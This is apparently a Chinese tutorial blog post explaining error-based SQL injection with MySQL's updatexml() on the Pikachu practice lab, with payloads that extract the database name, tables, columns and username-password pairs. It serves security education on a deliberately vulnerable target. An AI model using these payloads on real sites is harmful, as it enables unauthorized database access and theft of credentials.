数据库 SQL Server

详解SQL报错盲注

Posted in SQL Server onJuly 23, 2022

一、SQL报错函数详解

updatexml();floor();extractvalue();等函数都可以用于构造SQL报错函数，今天我们主要来讲解使用updatexml()函数。
updatexml()函数使用格式如下：

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文档名称，XPath_string是XPath格式的字符串，new_value是String格式的而字符串，用于替换查找到的符合条件的数据。
该函数有一个特性，即如果XPath_string不是XPath格式的字符串，就会报错并显示处XPath的值，因此，我们可以利用这一特性实现SQL报错盲注。此外，我们还可以利用updatexml()函数的特性，实现在SQL插入、删除等语句中的SQL注入。

二、SQL报错盲注payload构造

1、updatexml语句构造思路

updatexml()函数的构造，首先需要闭合SQL语句中的冒号、括号。其次还需要使用and或者or语句连接成一个单独的语句，这样即可成功执行updatexml()函数中的语句。
下面，我以皮卡丘靶场为例，来简单介绍一下updatexml报错注入payload的构造思路，皮卡丘靶场SQL insert/update型注入页面如下所示：

详解SQL报错盲注

从上图中可以看出，该页面功能上是提供人员的注册，因此可以猜测其内部是insert类型的SQL语句，因此我们可以在手机、住址等列（一般不要选择密码，因为很多网站都会把密码进行md5处理，从而导致我们的updatexml失效）中插入我们的updatexml语句。通过简单的实验可以得知，该站点的注入闭合为单引号，因此payload的构造格式为：

12' or updatexml() or'

2、查询当前数据库

当我们确定updatexml()函数的格式后，我们就可以写实际的payload语句了，相关命令如下所示：

12'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

从上payload可以看出，updatexml()函数有三部分组成，我们需要把我们要执行的SQL语句写到第二部分，第二部分是一个concat()函数，之所以要拼接0x7e是因为该16进制字符是一个波浪线，也可以换成其他的字符。
该payload执行结果如下所示：

详解SQL报错盲注

从上图可以看出，我们当前的数据库名为pikachu。

3、查询表名

查询表名的payload如下所示：

12' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or '

在上述payload中，concat中间的SQL语句要用括号括起来，然后写入正常的查询命令即可，该payload执行结果如下所示：

详解SQL报错盲注

从上图可以看出，我们查询到当前数据库存在一个名为httpinfo的表，如果我们更改limit的限制，那么我们可以得到更多的表。

4、查询列名

查询列名的payload如下所示：

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),0) or '

该payload构造原理与以上类似，执行结果如下所示：

详解SQL报错盲注

5、查询字段名

字段名查询的payload如下所示：

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu'),0x7e),0) or '

该payload构造原理与以上类似，执行结果如下所示：

详解SQL报错盲注

6、查询数据

数据查询的payload如下所示：

12' or updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1),0x7e),0) or '

该payload构造原理与以上类似，执行结果如下所示：

详解SQL报错盲注

到此这篇关于SQL报错盲注详解的文章就介绍到这了,更多相关SQL报错盲注内容请搜索三水点靠木以前的文章或继续浏览下面的相关文章希望大家以后多多支持三水点靠木！

详解SQL报错盲注

- Author -

永远是少年啊

- Original Sources -

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

SQL Server 相关文章推荐

SQL Server——索引+基于单表的数据插入与简单查询【1】

Apr 05 SQL Server

sqlserver2017共享功能目录路径不可改的解决方法

Apr 16 SQL Server

SQL Server2019数据库之简单子查询的具有方法

Apr 27 SQL Server

SQL Server代理：理解SQL代理错误日志处理方法

Jun 30 SQL Server

利用 SQL Server 过滤索引提高查询语句的性能分析

Jul 15 SQL Server

Spark SQL 2.4.8 操作 Dataframe的两种方式

Oct 16 SQL Server

SQL Server实现分页方法介绍

Mar 16 SQL Server

详解在SQLPlus中实现上下键翻查历史命令的功能

Mar 18 SQL Server

SQL Server数据库基本概念、组成、常用对象与约束

Mar 20 SQL Server

使用MybatisPlus打印sql语句

Apr 22 SQL Server

使用 MybatisPlus 连接 SqlServer 数据库解决 OFFSET 分页问题

Apr 22 SQL Server

详解SQL报错盲注

Jul 23 SQL Server

SQL bool盲注和时间盲注详解

Jul 23 #SQL Server

在SQL Server中使用 Try Catch 处理异常的示例详解

Jul 15 #SQL Server

SQL中的连接查询详解

Jun 21 #SQL Server

SQL Server数据库备份和恢复数据库的全过程

一次SQL查询优化原理分析(900W+数据从17s到300ms)

Jun 10 #SQL Server

SQL Server2019安装的详细步骤实战记录(亲测可用)

SQL Server携程核心系统无感迁移到MySQL实战

You might like

PHP与javascript对多项选择的处理

2006/10/09 PHP

php 文件缓存函数

2011/10/08 PHP

php获取文件名后缀常用方法小结

2015/02/24 PHP

PHP如何将log信息写入服务器中的log文件

2015/07/29 PHP

php面向对象重点知识分享

2019/09/27 PHP

IE7提供XMLHttpRequest对象为兼容

2007/03/08 Javascript

网页右键ie不支持event.preventDefault和event.returnValue （需要加window）

2013/02/22 Javascript

浅析Js中的单引号与双引号问题

2013/11/06 Javascript

二叉树先序遍历的非递归算法具体实现

2014/01/09 Javascript

JSON中双引号的轮回使用过程中一定要小心

2014/03/05 Javascript

jQuery中阻止冒泡事件的方法介绍

2014/04/12 Javascript

javascript限制用户只能输汉字中文的方法

2014/11/20 Javascript

JS简单操作select和dropdownlist实例

2014/11/26 Javascript

Bootstrap CSS使用方法

2016/12/23 Javascript

微信小程序新建登录页并实现tabBar隐藏

2017/06/13 Javascript

JavaScript登录验证基础教程

2017/11/01 Javascript

Nodejs监听日志文件的变化的过程解析

2019/08/04 NodeJs

在vue-cli 3中给stylus、sass样式传入共享的全局变量

2019/08/12 Javascript

python对url格式解析的方法

2015/05/13 Python

python 根据正则表达式提取指定的内容实例详解

2016/12/04 Python

python3中int（整型）的使用教程

2017/03/23 Python

Python操作SQLite数据库的方法详解

2017/06/16 Python

python如何通过实例方法名字调用方法

2018/03/21 Python

使用python画个小猪佩奇的示例代码

2018/06/06 Python

python async with和async for的使用

2019/06/20 Python

Python实现代码统计工具

2019/09/19 Python

Python魔法方法容器部方法详解

2020/01/02 Python

python爬取代理ip的示例

2020/12/18 Python

python time.strptime格式化实例详解

2021/02/03 Python

英国玛莎百货美国官网：Marks & Spencer美国

2018/11/06 全球购物

Windows和Linux动态库应用异同

2016/04/17 面试题

程序员经常用到的UNIX命令

2015/04/13 面试题

化验室技术员岗位职责

2013/12/24 职场文书

小学生新年寄语

2014/04/03 职场文书

Python字典和列表性能之间的比较

2021/06/07 Python

JVM入门之类加载与字节码技术(类加载与类的加载器)

2021/06/15 Java/Android